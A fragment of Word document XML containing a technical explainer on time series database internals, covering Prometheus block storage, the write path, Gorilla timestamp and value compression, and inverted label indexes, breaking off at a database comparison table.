      </w:r>
    </w:p>
    <w:p w14:paraId="4DF16879" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - Never update existing points (append-only)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4141D448" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2.3 Query Patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15799E55" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75BBE3FD" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Common queries:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44265B31" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  1. "Last value" — What's the current CPU usage of server-42?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E85516D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  2. "Range query" — CPU usage of server-42 over the last hour (360 points at 10s interval)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B918848" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  3. "Aggregation" — Average CPU across all servers in us-east, per minute, last 24 hours</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09260927" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  4. "Top-N" — Which 10 servers have highest p99 latency right now?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1339CC3A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  5. "Alert evaluation" — Is any server's error rate &gt; 5% in the last 5 minutes?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5C833F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  6. "Downsampling" — Weekly average temperature for the last 5 years</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1723C7E1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. TSDB Storage Engine Internals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B7BADC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.1 The Prometheus/InfluxDB Approach (Block-Based)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8865A2" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Prometheus TSDB (used as reference):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24AFDE48" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09EF2F53" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>┌─────────────────────────────────────────────────┐</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F73B59" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>│ HEAD BLOCK (in-memory, current 2-hour window)    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22ACA804" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>│  - Active series: in-memory chunks               │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54B65D65" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>│  - WAL: for crash recovery                       │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7329D184" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>│  - Fast writes: just append to memory            │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2657AF63" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>─────────────────────────────────────────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF03B51" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>│ BLOCK 1 (on-disk, immutable, 2 hours of data)   │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77203770" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>│  - index: series labels → chunk references       │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FBB98D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>│  - chunks: compressed time-value pairs           │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390A256C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>│  - tombstones: deleted series markers            │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554A79D9" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>─────────────────────────────────────────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25315CF7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t>│ BLOCK 2 (on-disk, immutable, 2 hours)           │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C82F1E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>├</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos" w:cs="Aptos"/>
        </w:rPr>
        <w:t>─────────────────────────────────────────────────</w:t>
      </w:r>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>┤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C4855D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>│ BLOCK 3 (on-disk, compacted, 6+ hours)          │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393D172E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>│  (multiple blocks merged during compaction)      │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77AF03BE" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>└─────────────────────────────────────────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102F8D88" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>How a write works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B55577A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64099838" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>1. Incoming sample: (series_id, timestamp, value)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F217F53" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>2. Find series in HEAD block's in-memory map → O(1) hash lookup</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231E6AF8" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>3. Append to the series' in-memory chunk (grows until ~120 samples)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FA816F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>4. Write to WAL (for crash recovery)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05447B42" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>5. Done. No disk I/O for the data path (until block flush).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F395716" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="45CEC51A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Write speed: millions of samples/sec (memory-only, sequential WAL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286C55AE" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.2 Compression — How TSDBs Achieve 1-2 Bytes Per Point</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F1FC8E1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Gorilla compression (Facebook, used by Prometheus):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616A4351" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Timestamp compression (delta-of-delta):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44A563A0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17EBCBDE" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Timestamps (10-second interval):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF8B5DA" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  T0 = 1716912000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F653A7F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  T1 = 1716912010 (delta = 10)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0981ECDC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  T2 = 1716912020 (delta = 10, delta-of-delta = 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58687BC7" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  T3 = 1716912030 (delta = 10, delta-of-delta = 0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B61628D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  T4 = 1716912041 (delta = 11, delta-of-delta = 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220E8C39" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="232627BF" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Encoding:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09CF9757" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  - delta-of-delta = 0: encode as single bit '0' (extremely common for regular intervals)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BEDACFC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - delta-of-delta ≠ 0: encode with variable-length prefix code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68122B37" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="1C10DDEF" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Result: Regular 10-second interval → 1 BIT per timestamp (0.125 bytes!)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E1EE474" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Value compression (XOR encoding):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122F0CB0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3206678C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Values (CPU percentages, slowly changing):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABF34C2" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  V0 = 72.3 (64-bit float: 0x4052133333333333)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5457DA94" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  V1 = 72.5 (64-bit float: 0x4052200000000000)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49695361" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68B0947D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  XOR(V0, V1) = 0x0000333333333333</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593D80F6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Leading zeros: 16, Trailing zeros: 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27893962" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Meaningful bits: 48</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566B1A2D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="65D80550" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Encoding: store only the meaningful bits (not all 64)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B50CD84" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  For slowly changing values: XOR has many leading/trailing zeros → very few bits stored.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E919AB" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="6A8A915B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Result: Smoothly changing values → 1-2 bytes per value (vs 8 bytes raw)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F740E6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Combined compression ratio:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0881A687" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70DE3CE4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Raw: 8 bytes (timestamp) + 8 bytes (value) = 16 bytes per point</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D2EB58" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Gorilla compressed: ~1.37 bytes per point on average (Facebook's paper)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9B53D3" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Compression ratio: ~12:1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57EBC315" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="0AA7D92B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>For 10M points/sec × 1.37 bytes = 13.7 MB/s of storage write (very manageable)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6443069C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.3 Inverted Index for Labels</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A616D27" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>How the TSDB finds series matching a label query:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A5733F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1442F7F4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Query: cpu_usage{region="us-east", host=~"server-4.*"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682F0ABA" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="6FBB7F86" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Inverted index:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07181E7C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  "region=us-east" → [series_1, series_5, series_42, series_99, ...]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4356369D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  "host=server-40" → [series_42]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7A0E62" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  "host=server-41" → [series_43]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E86AE47" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  "host=server-42" → [series_5]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD8AA1D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36030FF3" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="2E87A908" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Intersection: "region=us-east" ∩ "host=server-4*" → matching series IDs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256C63E3" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Then: read compressed chunks for those series IDs in the requested time range.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A40B5FC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. Major Time Series Databases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59"/>
        <w:gridCol w:w="2445"/>
        <w:gridCol w:w="2377"/>
        <w:gridCol w:w="2569"/>
      </w:tblGrid>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="4A11775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925911" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00875520">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Database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6FB6D2" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00875520">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
